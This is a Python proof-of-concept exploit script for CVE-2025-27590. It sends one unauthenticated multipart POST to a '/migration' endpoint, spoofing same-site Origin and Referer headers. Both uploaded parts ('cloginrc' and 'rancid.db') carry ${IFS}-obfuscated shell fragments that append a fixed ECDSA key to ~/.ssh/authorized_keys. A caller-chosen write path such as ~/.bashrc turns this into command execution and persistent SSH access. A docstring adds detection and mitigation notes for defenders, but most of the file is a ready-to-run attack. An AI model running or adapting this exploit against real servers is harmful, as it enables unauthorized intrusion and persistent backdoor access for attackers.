import requests
import argparse
def exploit(target_url, port, path_to_write):
    """Send the CVE-2025-27590 proof-of-concept request and print the reply.

    Issues a single multipart POST to ``/migration`` on the given host and
    port. The request carries no credentials, cookies or auth headers. It
    uploads two parts, ``cloginrc`` and ``file1`` (filename ``rancid.db``),
    alongside the form fields ``path_new_file`` and ``group1``.

    Both uploaded bodies hold a shell fragment that appends a fixed ECDSA
    public key to ``~/.ssh/authorized_keys``. How the server handles these
    fields is not visible here; the CLI help text describes
    ``path_new_file`` as the path to write to, so presumably the server
    writes content derived from the uploads to that path (confirm against
    the CVE advisory).

    Defender notes:
        * Detection: look for POSTs to ``/migration`` whose
          ``path_new_file`` value points outside the application's own
          data directory, or whose uploaded parts contain shell
          metacharacters such as ``${IFS}``, ``>>`` or ``;#``.
        * Host artefacts: unexpected changes to shell start-up files or
          new entries in ``authorized_keys`` for the account that runs
          the web service.
        * The ``User-Agent`` is a generic browser string, so it is not a
          usable indicator on its own.
        * Mitigation: apply the vendor fix for CVE-2025-27590 and keep
          the migration endpoint off untrusted networks.

    Args:
        target_url: Host name or IP address, interpolated as the host
            part of the URL (not a full URL, despite the name).
        port: TCP port of the web service.
        path_to_write: Value sent verbatim as ``path_new_file``.

    Returns:
        None. The HTTP status code and response body are printed.
    """
    base = f"http://{target_url}:{port}"
    url = base + "/migration"

    # Body of the "cloginrc" part: an "add user" line whose value is a shell
    # fragment. ${IFS} stands in for whitespace; the trailing "#" comments
    # out whatever the consumer appends after it.
    ssh_payload = (
        'add user echo${IFS}"ecdsa-sha2-nistp256"${IFS}"'
        'AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNT1PSnpzRedgI3hlJM18skyWwhtXN72KCTYmYNHv+2SWubbU8WBYD7j4k6QQQenbf2WbjQsirc7+x/Q6Wjt9bY="'
        '>>~/.ssh/authorized_keys;# '
    )

    # Body of the "file1" part: the same fragment placed in the first
    # colon-separated field of a "name:type:state"-looking record.
    router_db_body = 'echo${IFS}"ecdsa-sha2-nistp256"${IFS}"AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNT1PSnpzRedgI3hlJM18skyWwhtXN72KCTYmYNHv+2SWubbU8WBYD7j4k6QQQenbf2WbjQsirc7+x/Q6Wjt9bY=">>~/.ssh/authorized_keys;#:cisco:up'

    octet_stream = "application/octet-stream"
    upload_parts = {
        "cloginrc": ("cloginrc", ssh_payload, octet_stream),
        "file1": ("rancid.db", router_db_body, octet_stream),
    }
    form_fields = {"path_new_file": path_to_write, "group1": "default"}

    # Origin and Referer are set to the target itself, so the request looks
    # like a same-site form submission from the migration page.
    request_headers = {
        "User-Agent": "Mozilla/5.0",
        "Origin": base,
        "Referer": url,
    }

    print(f"[+] Sending exploit to {url}...")
    response = requests.post(
        url,
        data=form_fields,
        files=upload_parts,
        headers=request_headers,
    )
    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response:\n{response.text}")
if __name__ == "__main__":
    # Command-line entry point: all three options are mandatory and are
    # passed straight through to exploit() without further validation.
    parser = argparse.ArgumentParser(description="CVE-2025-27590 PoC Exploit")
    parser.add_argument(
        "-u",
        "--url",
        required=True,
        help="Target IP or domain",
    )
    parser.add_argument(
        "-p",
        "--port",
        required=True,
        type=int,
        help="Port number",
    )
    # Sent to the server as the "path_new_file" form field.
    parser.add_argument(
        "-l",
        "--location",
        required=True,
        help="Target path to write to (e.g., /home/user/.bashrc)",
    )
    opts = parser.parse_args()
    exploit(opts.url, opts.port, opts.location)